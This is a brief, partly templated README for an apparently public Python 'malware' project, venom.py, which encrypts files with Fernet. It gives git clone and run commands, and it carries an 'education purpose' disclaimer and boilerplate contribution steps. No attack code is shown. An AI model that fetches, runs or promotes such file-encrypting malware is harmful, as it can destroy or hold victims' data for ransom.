<< This is only for the education perpose >>
This is a basic malware made using python which encrypt the file using cryptography.fernet
git clone https://github.com/Root-acess/malwares
cd malwares
Python
python venom.py python3 venom.py
If you would like to contribute to the project, provide guidelines for how others can do so. Include information on how to submit bug reports, feature requests, and the process for making contributions (e.g., pull requests).
markdown Copy code
- Fork the project
- Create a new branch (
git checkout -b feature/new-feature) - Make your changes
- Commit your changes (
git commit -m 'Add new feature') - Push to the branch (
git push origin feature/new-feature) - Open a pull request
Feel free to customize this README template based on the specifics of your project. Provide as much detail as needed to help users understand and contribute to your project effectively.